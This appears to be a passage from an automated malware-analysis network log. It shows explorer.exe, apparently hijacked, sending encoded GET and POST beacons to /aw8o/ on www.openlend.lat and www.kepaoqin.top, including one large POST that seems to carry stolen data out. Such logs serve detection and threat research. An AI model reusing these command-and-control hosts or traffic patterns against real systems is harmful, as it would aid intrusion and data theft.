                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:19:46.865792036 CEST622INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 708
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:46 GMT
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          19192.168.11.2049734169.150.247.3980C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:51.900604010 CEST623OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.openlend.lat
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.openlend.lat
                                                                                                                                                                                          Referer: http://www.openlend.lat/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 45 79 6e 56 2f 30 6d 31 68 31 49 7a 43 2b 30 78 44 47 48 61 73 6c 43 32 6c 30 69 2f 6c 46 41 43 77 6b 6d 49 37 74 2b 71 48 7a 51 71 38 5a 62 6f 6d 6b 49 70 4f 4a 74 56 2f 61 69 2f 56 35 38 41 46 4f 38 76 5a 61 59 57 52 56 4d 46 51 77 78 34 38 51 6e 71 66 66 49 56 54 63 51 76 5a 4c 47 59 35 4f 32 53 53 33 5a 78 74 77 4d 44 70 37 63 67 4e 71 47 32 76 6d 75 43 49 47 6c 2f 69 67 70 59 2f 2b 6e 6d 50 49 48 76 54 54 49 50 49 4e 6f 37 44 65 69 74 71 39 79 2b 2b 39 77 64 69 6a 41 31 4f 59 69 31 49 2f 61 5a 42 6a 73 38 7a 6e 64 36 71 51 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=EynV/0m1h1IzC+0xDGHaslC2l0i/lFACwkmI7t+qHzQq8ZbomkIpOJtV/ai/V58AFO8vZaYWRVMFQwx48QnqffIVTcQvZLGY5O2SS3ZxtwMDp7cgNqG2vmuCIGl/igpY/+nmPIHvTTIPINo7Deitq9y++9wdijA1OYi1I/aZBjs8znd6qQ==
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087491989 CEST624INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:52 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Server: BunnyCDN-DE1-1082
                                                                                                                                                                                          CDN-PullZone: 1536508
                                                                                                                                                                                          CDN-Uid: 604b1f1d-7233-45b4-b382-b287d2fc47e3
                                                                                                                                                                                          CDN-RequestCountryCode: CH
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Location: https://www.openlend.lat/aw8o/
                                                                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                                                                          CDN-RequestPullCode: 301
                                                                                                                                                                                          CDN-CachedAt: 08/10/2023 08:19:52
                                                                                                                                                                                          CDN-EdgeStorageId: 1082
                                                                                                                                                                                          CDN-RequestId: 2bbc9873d0bef1ad60562f9075a18edb
                                                                                                                                                                                          Aug 10, 2023 10:19:52.087554932 CEST624INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          2192.168.11.2049717107.148.17.6780C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:18:48.197916985 CEST270OUTGET /aw8o/?P4=_n5TPHiTKZj&1NM6e=UdSYgafQlh0t2NPJFWsJTuyq7bpxDbJ0k4ok7GV9MtKriqrdB2GNDlXOyj3801N/gTxArORLFOT1XOkGkvvmtP3cZGRd+UEGYg== HTTP/1.1
                                                                                                                                                                                          Host: www.kepaoqin.top
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:18:48.451350927 CEST271INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:18:48 GMT
                                                                                                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Content-Length: 1706
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 af a5 e9 a1 b5 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e 6c 61 2f 32 31 32 37 39 36 39 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 20 73 72 63 3d 22 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e 6c 61 2f 32 31 37 35 31 35 30 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0d 0a 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 68 31 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 af a5 e9 a1 b5 3c 2f 68 31 3e 0d 0a e6 82 a8 e6 ad a3 e5 9c a8 e6 90 9c e7 b4 a2 e7 9a 84 e9 a1 b5 e9 9d a2 e5 8f af e8 83 bd e5 b7 b2 e7 bb 8f e5 88 a0 e9 99 a4 e3 80 81 e6 9b b4 e5 90 8d e6 88 96 e6 9a 82 e6 97 b6 e4 b8 8d e5 8f af e7 94 a8 e3 80 82 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e e8 af b7 e5 b0 9d e8 af 95 e4 bb a5 e4 b8 8b e6 93 8d e4 bd 9c ef bc 9a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e e7 a1 ae e4 bf 9d e6 b5 8f e8 a7 88 e5 99 a8 e7 9a 84 e5 9c b0 e5 9d 80 e6 a0 8f e4 b8 ad e6 98 be e7 a4 ba e7 9a 84 e7 bd 91 e7 ab 99 e5 9c b0 e5 9d 80 e7 9a 84 e6 8b bc e5 86 99 e5 92 8c e6 a0 bc e5 bc 8f e6 ad a3 e7 a1 ae e6 97 a0 e8 af af e3 80 82 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e e5 a6 82 e6 9e 9c e9 80 9a e8 bf 87 e5 8d 95 e5 87 bb e9 93 be e6 8e a5 e8 80 8c e5 88 b0 e8 be be e4 ba 86 e8 af a5 e7 bd 91 e9 a1 b5 ef bc 8c e8 af b7 e4 b8 8e e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 81 94 e7 b3 bb ef bc 8c e9 80 9a e7 9f a5 e4 bb 96 e4 bb ac e8 af a5 e9 93 be e6 8e a5 e7 9a 84 e6 a0 bc e5 bc 8f e4 b8 8d e6 ad a3 e7 a1 ae e3 80 82 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e e5 8d 95 e5 87 bb 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e e5 90 8e e9 80 80 3c 2f 61 3e e6 8c 89 e9 92 ae e5 b0 9d e8 af 95 e5 8f a6 e4 b8 80 e4 b8 aa e9 93
                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312"><STYLE type="text/css"> BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><script type="text/javascript" async src="https://js.users.51.la/21279699.js"></script><script type="text/javascript" async src="//js.users.51.la/21751501.js"></script> <TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li></li><li></li><li><a href="javascript:history.back(1)"></a>
                                                                                                                                                                                          Aug 10, 2023 10:18:48.451369047 CEST272INData Raw: be e6 8e a5 e3 80 82 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 e9 94 99 e8 af af 20 34 30 34 20 2d 20 e6 96 87 e4 bb b6 e6 88 96 e7 9b ae e5 bd 95 e6 9c aa e6 89 be e5 88 b0 e3 80 82 3c 62 72 3e 49 6e 74 65 72 6e 65 74
                                                                                                                                                                                          Data Ascii: </li></ul><h2>HTTP 404 - <br>Internet (IIS)</h2><hr><p></p><ul><li> <a href="http://go.microsoft.com/fwlink/?linkid=8180">Micr


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          20192.168.11.2049735169.150.247.3980C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:54.432908058 CEST625OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.openlend.lat
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.openlend.lat
                                                                                                                                                                                          Referer: http://www.openlend.lat/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 45 79 6e 56 2f 30 6d 31 68 31 49 7a 41 62 38 78 46 6c 76 61 38 31 43 31 67 30 69 2f 73 6c 42 4a 77 6b 61 49 37 73 36 36 48 6d 34 71 38 38 66 6f 33 56 49 70 4c 4a 74 56 31 36 69 36 62 5a 38 65 46 50 41 5a 5a 66 34 57 52 56 49 46 51 44 70 34 34 51 6e 70 55 2f 49 55 45 73 51 71 64 4c 47 43 35 4f 7a 78 53 32 4e 78 74 41 77 44 71 35 45 67 65 50 79 31 38 32 75 45 63 32 6c 38 74 41 70 57 2f 2b 71 47 50 4d 43 59 54 68 55 50 49 70 6b 37 43 65 69 69 6b 4e 79 7a 32 64 78 61 78 79 41 37 41 4c 79 52 58 64 79 32 45 53 4e 69 79 30 67 56 2b 77 61 39 50 4c 38 38 38 74 4e 6f 2f 39 68 42 6f 45 47 2b 46 66 67 77 74 36 76 7a 4b 67 32 32 62 62 4c 44 73 59 34 4f 7a 41 59 65 59 61 35 5a 61 38 73 53 66 79 51 2b 52 41 46 7a 78 5a 33 50 48 46 4a 4b 55 78 42 30 6d 74 30 50 42 55 56 41 68 45 46 74 33 6b 45 57 50 34 6f 4f 43 48 76 42 56 4a 36 56 6c 36 4e 6b 74 42 66 70 7a 5a 69 4b 4c 4c 4f 2f 58 47 33 62 39 34 6e 6e 41 2b 36 6a 7a 52 56 41 77 32 34 55 5a 72 65 46 2f 37 7a 75 76 67 75 55 6f 33 69 63 77 57 30 74 58 2f 38 6c 33 69 65 77 43 43 45 2f 6f 4c 57 2b 4d 30 4b 48 58 69 70 70 5a 59 37 6a 6a 56 72 43 53 2f 39 31 4a 6b 44 62 53 6d 37 71 34 54 38 79 6b 50 6b 33 43 75 6c 75 64 70 75 4d 4f 4c 4c 45 6d 31 63 76 75 6a 4d 69 4f 4c 33 58 69 6e 51 51 79 6b 66 31 52 73 68 6a 53 6b 31 34 45 4b 37 73 74 4c 62 51 51 32 57 53 69 78 35 6b 4d 65 79 63 61 46 47 64 68 4c 33 42 52 37 31 6c 30 4f 4a 44 55 65 47 4e 67 2b 69 37 48 4b 31 59 33 42 7a 71 6e 6b 61 51 46 6b 4b 6e 53 68 66 72 34 56 53 41 46 51 44 51 76 69 68 56 57 33 4a 57 49 58 33 68 33 2f 79 4a 64 69 68 6c 69 70 4d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=EynV/0m1h1IzAb8xFlva81C1g0i/slBJwkaI7s66Hm4q88fo3VIpLJtV16i6bZ8eFPAZZf4WRVIFQDp44QnpU/IUEsQqdLGC5OzxS2NxtAwDq5EgePy182uEc2l8tApW/+qGPMCYThUPIpk7CeiikNyz2dxaxyA7ALyRXdy2ESNiy0gV+wa9PL888tNo/9hBoEG+Ffgwt6vzKg22bbLDsY4OzAYeYa5Za8sSfyQ+RAFzxZ3PHFJKUxB0mt0PBUVAhEFt3kEWP4oOCHvBVJ6Vl6NktBfpzZiKLLO/XG3b94nnA+6jzRVAw24UZreF/7zuvguUo3icwW0tX/8l3iewCCE/oLW+M0KHXippZY7jjVrCS/91JkDbSm7q4T8ykPk3CuludpuMOLLEm1cvujMiOL3XinQQykf1RshjSk14EK7stLbQQ2WSix5kMeycaFGdhL3BR71l0OJDUeGNg+i7HK1Y3BzqnkaQFkKnShfr4VSAFQDQvihVW3JWIX3h3/yJdihlipM=
                                                                                                                                                                                          Aug 10, 2023 10:19:54.531361103 CEST626INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:54 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Server: BunnyCDN-DE1-1082
                                                                                                                                                                                          CDN-PullZone: 1536508
                                                                                                                                                                                          CDN-Uid: 604b1f1d-7233-45b4-b382-b287d2fc47e3
                                                                                                                                                                                          CDN-RequestCountryCode: CH
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Location: https://www.openlend.lat/aw8o/
                                                                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                                                                          CDN-RequestPullCode: 301
                                                                                                                                                                                          CDN-CachedAt: 08/10/2023 08:19:54
                                                                                                                                                                                          CDN-EdgeStorageId: 1082
                                                                                                                                                                                          CDN-RequestId: e4f5dc4effe599db7c24ded7bf031c3b
                                                                                                                                                                                          Aug 10, 2023 10:19:54.531399965 CEST626INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          21192.168.11.2049736169.150.247.3980C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:56.964212894 CEST633OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.openlend.lat
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.openlend.lat
                                                                                                                                                                                          Referer: http://www.openlend.lat/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 45 79 6e 56 2f 30 6d 31 68 31 49 7a 41 62 38 78 46 6c 76 61 38 31 43 31 67 30 69 2f 73 6c 42 4a 77 6b 61 49 37 73 36 36 48 67 67 71 38 4b 6a 6f 6c 47 51 70 4d 4a 74 56 75 36 69 37 62 5a 39 62 46 50 59 46 5a 66 38 67 52 58 41 46 52 52 42 34 74 7a 50 70 52 2f 49 58 49 4d 51 6f 5a 4c 48 44 35 4f 32 77 53 32 5a 4c 74 77 55 44 70 37 4d 67 63 49 65 32 30 47 75 43 63 32 6c 77 38 51 6f 38 2f 39 47 57 50 4d 4f 59 54 69 67 50 61 4c 73 37 46 4a 32 69 70 39 79 79 38 39 78 6a 6e 43 42 44 41 4c 6d 72 58 64 79 41 45 51 68 69 79 7a 55 56 39 33 32 69 50 72 38 38 2f 74 4e 76 6f 73 64 61 6f 48 7a 37 46 63 38 77 74 38 72 7a 4b 41 32 32 4c 50 58 41 71 34 35 4c 6c 77 59 4e 53 36 6c 42 61 39 4e 31 66 7a 6b 2b 52 77 35 7a 78 71 66 50 41 6b 4a 4b 4c 68 42 32 73 4e 31 56 61 45 56 6d 68 45 30 4f 33 67 34 73 50 2b 45 4f 44 69 37 42 46 36 69 57 31 4b 4e 69 77 78 66 67 34 34 65 57 4c 4c 2b 6a 58 47 32 41 39 38 2f 6e 42 4f 4b 6a 77 55 31 44 78 47 34 54 43 37 65 71 30 62 75 68 76 6a 4c 59 6f 33 61 4d 77 52 55 74 47 76 38 6c 6c 78 47 33 62 69 45 34 31 62 57 67 42 55 4c 52 58 69 6c 50 5a 5a 75 57 67 6c 48 43 51 50 74 31 4d 30 44 61 55 47 37 6d 75 6a 38 30 7a 2f 6b 33 43 75 34 4b 64 70 69 4d 4f 34 58 45 6e 48 30 76 72 30 67 69 4d 4c 33 5a 69 6e 52 57 79 6b 54 57 52 73 6f 41 53 6e 39 65 45 49 33 73 6a 2f 66 51 58 33 57 64 30 78 34 75 49 65 7a 46 55 6c 4b 47 68 4c 72 7a 52 37 6b 65 30 65 31 44 56 65 57 4e 33 75 69 34 58 61 31 66 6e 68 7a 77 6a 6b 47 45 46 6b 47 33 53 68 48 37 34 56 4b 41 47 42 32 4a 7a 69 6f 49 43 6d 5a 70 50 79 76 32 2b 65 75 4b 65 43 68 42 67 50 44 72 49 68 6d 42 77 47 45 39 70 4a 54 31 2b 2b 4f 41 6d 6e 73 76 4a 46 79 48 79 2f 6e 5a 78 37 38 34 63 59 65 30 6d 4d 63 37 4e 77 47 32 77 45 31 46 30 4d 4d 72 7a 48 55 6e 57 44 43 56 43 68 4d 6c 42 2f 76 64 4e 42 4a 54 77 34 4c 48 75 65 42 30 66 45 37 38 6c 77 4d 4d 6d 75 33 77 36 56 6d 54 66 6e 50 52 72 32 61 41 59 48 6b 52 58 38 47 6e 64 6b 65 48 73 75 64 71 33 6f 39 33 6c 57 7a 35 67 48 64 37 43 78 37 4f 59 49 72 69 58 72 39 36 62 73 6b 53 48 35 43 52 67 7a 6f 56 56 67 61 73 4f 73 73 53 54 50 43 54 58 78 6b 6b 73 4c 67 50 67 44 35 2f 5a 71 45 6a 37 32 75 42 39 68 4e 5a 78 74 47 55 33 73 4e 4d 30 32 66 43 53 57 2b 67 70 68 45 7a 49 32 47 65 62 37 30 73 50 4f 45 47 4c 4b 46 74 6d 30 62 67 46 53 39 4c 56 39 37 32 47 32 67 34 77 71 35 7a 73 62 51 77 61 58 69 5a 78 54 62 50 69 65 45 70 52 58 59 46 37 4a 6e 41 38 79 50 5a 53 4f 44 45 37 4c 37 50 30 6c 46 4b 45 38 51 56 34 43 2b 64 36 48 37 2f 38 66 58 2b 73 6e 6e 61 68 76 38 4a 72 38 70 36 71 62 6f 5a 74 43 78 30 34 73 47 76 77 56 32 76 6c 6d 51 64 32 50 32 6f 62 46 71 54 55 4f 32 37 47 64 53 42 44 4f 39 63 66 70 79 54 78 61 57 52 6e 61 4a 41 6e 34 77 70 78 64 69 57 50 61 61 58 4c 42 69 63 39 69 7a 4a 52 6e 48 45 66 56 38 4b 52 42 6d 68 6d 54 57 56 6a 53 79 64 44 32 64 4f 38 72 70 59 62 75 34 2f 5a 55 41 74 47 2b 46 73 77 65 73 30 74 61 76 74 6d 52 4d 48 33 65 72 4c 44 73 6d 61 49 56 35 6d 44 51 66 7a 52 49 6e 72 50 46 76 4e 58 71 73 61 5a 4c 41 32 37 6a 46 33 4b 70 62 48 36 30 59 62 37 69 51 59 6a 5a 4e 32 2b 44 61 4c 72 79 68 50 74 5a 70 6b 76 71 4d 38 61 37 41 78 4f 31 37 7a 59 73 57 6a 62 38 4d 4a 6d 6e 6a 49 70 66 75 76 5a 39 70 66 79 58 68 33 62 50 6a 75 61 4f 61 50 79 50 36 58 4a 68 45 78 2f 77 32 71 55 76 4d 48 6f 79 34 65 73 46 35 6a 53 5a 6c 4a 7a 34 42 37 31 31 7a 43 6b 4b 62 4d 78 59 46 66 6a 70 37 63 2f 2f 75 59 35 54 41 58 35 53 6b 37 57 6d 57 35 45 4a 31 42 42 54 72 49 4c 4f 59 50 48 6a 33 39 41 62 76 76 6a 43 79 50 44 74 62 76 5a 57 2f 6a 6f 67 68 6d 63 64 2f 35 63 74 74 46 2b 74 56 4c 47 6a 6b 39 49 56 77 54 39 39 67 44 75 67 50 76 71 56 73 55 2f 49 6a 79 4d 74 5a 62 64 4a 50 72 53 72 52 79 45 49 46 4f 68 7a 64 53 49 41 4d 6d 6c 68 76 59 6b 77 52 66 7a 31 78 59 48 6b 49 73 4e 71 4d 6d 73 57 51 54 5a 79 49 50 6d 54 6d 69 53 4f 33 43 79 37 4a 4e 33 42 70 6c 4e 6a 6b 67 56 70 64 48 67 69 43 41 53 44 6d 45 75 37 2f 63 56 45 54 4a 62 55 42 6a 6e 6e 46 42 41 